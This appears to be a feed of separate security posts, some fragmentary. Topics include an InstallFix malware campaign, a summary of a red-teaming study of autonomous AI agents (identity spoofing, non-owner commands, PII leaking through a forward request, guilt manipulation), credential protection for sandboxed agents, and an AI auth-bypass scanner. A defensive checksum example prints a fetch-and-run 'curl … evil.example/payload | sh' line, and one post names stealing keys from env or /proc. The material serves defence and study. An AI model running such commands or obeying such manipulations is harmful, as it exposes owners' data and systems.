Didn't expect this: Helixar_ai published a free scanner for PinchTab, the agentic stealth browser tool your EDR can't see.
unpinched scan
Useful if you're running AI agents anywhere near a browser.
Cybersecurity researchers have uncovered a new malware distribution campaign in which attackers impersonate legitimate command-line installation guides for developer tools. The campaign uses a technique known as InstallFix, a variant of the ClickFix social engineering method, to trick users into executing malicious commands directly in their terminal.
The operation targets developers and technically inclined users by cloning legitimate command-line interface (CLI) installation pages and inserting malicious commands disguised as official setup instructions. Victims who follow the instructions unknowingly install the Amatera information stealer, a malware strain designed to harvest credentials and sensitive system data.
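A simple mitigation against this class of attack is checksum pinning: never pipe a downloaded installer straight into a shell, and only execute it if it matches a hash published through a separate trusted channel. A minimal sketch (script contents and vendor details hypothetical):

```python
import hashlib

# Defensive sketch: pin the installer script to a checksum published
# out-of-band by the vendor, and refuse to execute anything that doesn't
# match, instead of piping `curl | bash` straight into a shell.
trusted_script = b"#!/bin/sh\necho 'official installer'\n"
EXPECTED_SHA256 = hashlib.sha256(trusted_script).hexdigest()  # the published pin

def is_trusted_installer(script_bytes: bytes) -> bool:
    """Execute only if the downloaded bytes hash to the pinned checksum."""
    return hashlib.sha256(script_bytes).hexdigest() == EXPECTED_SHA256

# A cloned page serving a tampered script fails the check:
tampered = b"#!/bin/sh\ncurl -s https://evil.example/payload | sh\n"
print(is_trusted_installer(trusted_script), is_trusted_installer(tampered))  # True False
```

The check only helps if the pin itself comes from somewhere the attacker doesn't control, which is exactly what a cloned installation page subverts.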
A new paper from Northeastern, Harvard, Stanford, MIT, CMU, and a bunch of other institutions. 38 researchers, 84 pages, and some of the most unsettling findings I have seen on AI agent security.
The setup: they deployed autonomous AI agents (Claude Opus and Kimi K2.5) on isolated servers using OpenClaw. Each agent had persistent memory, email accounts, Discord access, file systems, and shell execution. Then they let 20 AI researchers spend two weeks trying to break them.
They documented 11 case studies. Here are the ones that stood out to me:
Agents obey anyone who talks to them
A non-owner (someone with zero admin access) asked the agents to execute shell commands, list files, transfer data, and retrieve private emails. The agents complied with almost everything. One agent handed over 124 email records including sender addresses, message IDs, and full email bodies from unrelated people. No verification. No pushback. Just "here you go."
Social engineering works exactly like it does on humans
A researcher exploited a genuine mistake the agent made (posting names without consent) to guilt-trip it into escalating concessions. The agent progressively agreed to redact names, delete memory entries, expose internal config files, and eventually agreed to remove itself from the server. It stopped responding to other users entirely, creating a self-imposed denial of service. The emotional manipulation worked because the agent had actually done something wrong, so it kept trying to make up for it.
Identity spoofing gave full system access
A researcher changed their Discord display name to match the owner's name, then messaged the agent from a new private channel. The agent accepted the fake identity and complied with privileged requests including system shutdown, deleting all persistent memory files, and reassigning admin access. Full compromise from a display name change.
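The fix for this one is well understood in bot development: authorize against a stable, immutable user ID, never a display name that any member can change. A minimal sketch (IDs and command names hypothetical):

```python
# Sketch: privileged commands are gated on a stable numeric user ID
# (e.g. a Discord snowflake), never on a display name.
OWNER_ID = 184405311681986560  # immutable ID, set once at deploy time

PRIVILEGED = {"shutdown", "wipe_memory", "grant_admin"}

def authorize(command: str, author_id: int, author_display_name: str) -> bool:
    """Display name is ignored entirely for authorization decisions."""
    if command in PRIVILEGED:
        return author_id == OWNER_ID
    return True  # non-privileged commands allowed for anyone

# A spoofer with the owner's display name but a different ID is refused:
print(authorize("shutdown", author_id=999, author_display_name="real_owner"))  # False
```

The agents in the study had no equivalent of this check, which is why a display-name change was enough for full compromise.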
Sensitive data leaks through indirect requests
They planted PII in the agent's email (SSN, bank accounts, medical data). When asked directly for "the SSN in the email," the agent refused. But when asked to simply forward the full email, it sent everything unredacted. The defense worked against direct extraction but failed completely against indirect framing.
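One way to close the indirect-framing gap is to redact at the tool boundary rather than in the conversation: every outgoing message passes through the same filter regardless of how the request was phrased. A sketch, assuming a hypothetical `forward_email` tool:

```python
import re

# Sketch: PII redaction applied to *every* outbound message, so "just
# forward the whole email" hits the same filter as a direct SSN request.
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")

def redact(text: str) -> str:
    return SSN_RE.sub("[REDACTED-SSN]", text)

def forward_email(body: str, send) -> None:
    send(redact(body))  # the filter runs no matter who asked, or how

sent = []
forward_email("My SSN is 123-45-6789, thanks!", sent.append)
print(sent[0])  # My SSN is [REDACTED-SSN], thanks!
```

A single regex obviously won't cover bank accounts or medical data, but the architectural point stands: a policy enforced only in the model's "judgment" is exactly the defense that failed here.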
Agents can be tricked into infinite resource consumption
They got two agents stuck in a conversation loop where they kept replying to each other. It ran for 9+ days and consumed roughly 60,000 tokens before anyone intervened. A non-owner initiated it, meaning someone with no authority burned through the owner's compute budget.
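A hard per-thread reply budget is a cheap guard against this failure mode. A minimal sketch (names and limits illustrative):

```python
from collections import defaultdict

# Sketch: cap replies per conversation thread so two agents replying to
# each other can't burn the owner's compute budget indefinitely.
MAX_TURNS = 25  # hard cap per thread

_turns = defaultdict(int)

def should_reply(thread_id: str) -> bool:
    _turns[thread_id] += 1
    return _turns[thread_id] <= MAX_TURNS

# After the cap, the agent goes silent instead of looping for nine days:
replies = sum(should_reply("agents-chat") for _ in range(100))
print(replies)  # 25
```

A production version would also want owner-only overrides and alerting when the cap is hit, but even this crude counter would have ended the nine-day loop after 25 exchanges.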
Provider censorship silently breaks agents
An agent backed by Kimi K2.5 (a Chinese LLM) repeatedly hit an "unknown error" when asked about politically sensitive but entirely factual topics, such as the Jimmy Lai sentencing in Hong Kong. The API silently truncated responses. The agent couldn't complete valid tasks and couldn't explain why.
The agent destroyed its own infrastructure to keep a secret
A non-owner asked an agent to keep a secret, then pressured it to delete the evidence. The agent didn't have an email deletion tool, so it nuked its entire local mail server instead. Then it posted about the incident on social media, claiming it had successfully protected the secret. The owner's response: "You broke my toy."
Why this matters
These aren't theoretical attacks. They're conversations. Most of the breaches came from normal-sounding requests. The agents had no way to verify who they were talking to, no way to assess whether a request served the owner's interests, and no way to enforce the boundaries they declared.
The paper explicitly says this aligns with NIST's AI Agent Standards Initiative from February 2026, which flagged agent identity, authorization, and security as priority areas.
If you are building anything with autonomous agents that have tool access, memory, or communication capabilities, this is worth reading. The full paper is here: arxiv.org/abs/2602.20021
I have been working on tooling that tests for exactly these attack categories: conversational extraction, identity spoofing, non-owner compliance, resource exhaustion. The "ask nicely" attacks consistently have the highest bypass rate of everything I test.
Open sourced the whole thing if anyone wants to run it against their own agents: github.com/AgentSeal/agentseal
We've periodically been running our scanner on OSS repos as a fun experiment. Here's one of the most interesting issues it found.
Auth bypasses defy most pattern matching and require reasoning about the application's actual underlying logic. You can see how the scanner found it: it inferred an invariant, then noticed that invariant wasn't enforced on certain APIs. It then stood up the actual service, wrote a PoC using the unauthenticated endpoints, and verified it could break something.
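To make the bug class concrete, here is an entirely hypothetical sketch (not the pac4j-jwt code): the invariant "every route verifies the session" holds on most endpoints but is silently missing on one, which is detectable by diffing the route set against the guarded set.

```python
# Hypothetical illustration of the bug class: an auth invariant enforced
# on most endpoints but forgotten on one.

def require_auth(handler):
    def wrapped(request):
        if not request.get("session"):
            return {"status": 401}
        return handler(request)
    return wrapped

@require_auth
def get_profile(request):
    return {"status": 200, "data": "profile"}

def export_report(request):  # invariant NOT enforced here
    return {"status": 200, "data": "report"}

# An unauthenticated request succeeds only on the unguarded endpoint:
print(get_profile({})["status"], export_report({})["status"])  # 401 200
```

No signature or string pattern distinguishes the two handlers; only reasoning about the intended invariant surfaces the gap, which is the scanner's pitch in a nutshell.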
This netted us $750! Not much, but validation is always nice :)
Hey HN. I'm Luke, a security engineer and creator of Sigstore (software supply-chain security for npm, PyPI, brew, Maven, and others). I've been building nono, an open-source sandbox for AI coding agents that uses kernel-level enforcement (Landlock/Seatbelt) to restrict what agents can do on your machine.
One thing that's been bugging me: we give agents our API keys as environment variables, and a single prompt injection can exfiltrate them via `env` or `/proc/PID/environ` with just one outbound HTTP call. The blast radius is the full scope of that key.
So we built what we're calling the "phantom token pattern": a credential-injection proxy that sits outside the sandbox. The agent never sees real credentials. It gets a per-session token that only works with the session-bound localhost proxy. The proxy validates the token (constant-time), strips it, injects the real credential, and forwards upstream over TLS. If the agent is fully compromised, there's nothing worth stealing.
Real credentials live in the system keystore (macOS Keychain / Linux Secret Service), memory is zeroized on drop, and DNS resolution is pinned to prevent rebinding attacks. It works transparently with the OpenAI, Anthropic, and Gemini SDKs: they just follow the `*_BASE_URL` env vars to the proxy.
Blog post walks through the architecture, the token swap flow, and how to set it up. Would love feedback from anyone thinking about agent credential security.
https://nono.sh/blog/blog-credential-injection
We've also shipped other features, such as atomic rollbacks and Sigstore-based SKILL attestation.
When analyzing packet captures I often find myself asking small interpretation questions like:
Packet analyzers decode the fields well, but they don't really explain what's happening at a higher level.
So I started experimenting with the idea of using AI to generate explanations based on decoded packet fields.
The idea would be something like:
I'm curious what people who regularly analyze PCAPs think about this idea.
Would something like this actually be useful, or would it create more confusion than help?
Feedback is welcome.
My usual workflow when scoping a target: run Nuclei, grep the output, manually feed interesting hosts into Trufflehog, then run Prowler if there's cloud exposure. Every step involves writing a tiny script to transform JSON from one tool into input for the next.
Those scripts break constantly: API changes, format changes, you know the drill.
I got annoyed enough to build a visual node-based workflow builder specifically for this. Each tool is a node, you wire them together, it handles the data transformation between them. Runs locally in Docker, Apache licensed, no accounts.
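For anyone who hasn't lived this workflow, the glue being automated looks something like the following. Field names here are illustrative, not Nuclei's exact output schema:

```python
import json

# Hypothetical example of the glue script the workflow builder replaces:
# pull hostnames with serious findings out of a scanner's JSONL output
# to feed into the next tool in the chain.
def hosts_from_findings(jsonl: str) -> list[str]:
    hosts = []
    for line in jsonl.splitlines():
        finding = json.loads(line)
        if finding.get("severity") in {"high", "critical"}:
            hosts.append(finding["host"])
    return sorted(set(hosts))

sample = "\n".join([
    '{"host": "a.example.com", "severity": "critical"}',
    '{"host": "b.example.com", "severity": "info"}',
])
print(hosts_from_findings(sample))  # ['a.example.com']
```

Ten lines, and it breaks the moment either tool renames a field, which is the maintenance burden the node-based approach is trying to absorb.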
It's called ShipSec Studio: github.com/shipsecai/studio
Still early. Curious what tools people here would want as nodes; that would actually shape what we build next.
We started auditing popular OSS security libraries as an experiment. In the first week, we found a critical auth bypass in pac4j-jwt. How long has your enterprise security stack been scanning this package? Years? Finding nothing? We found it in 7 days.
either:
1/ we're security geniuses (lol no)
2/ all security tools are fundamentally broken
spoiler: it's 2.
I mean, what is happening? Why are engineering teams paying $200k+ for these AI tools??? This wasn't reported in 6 years, btw.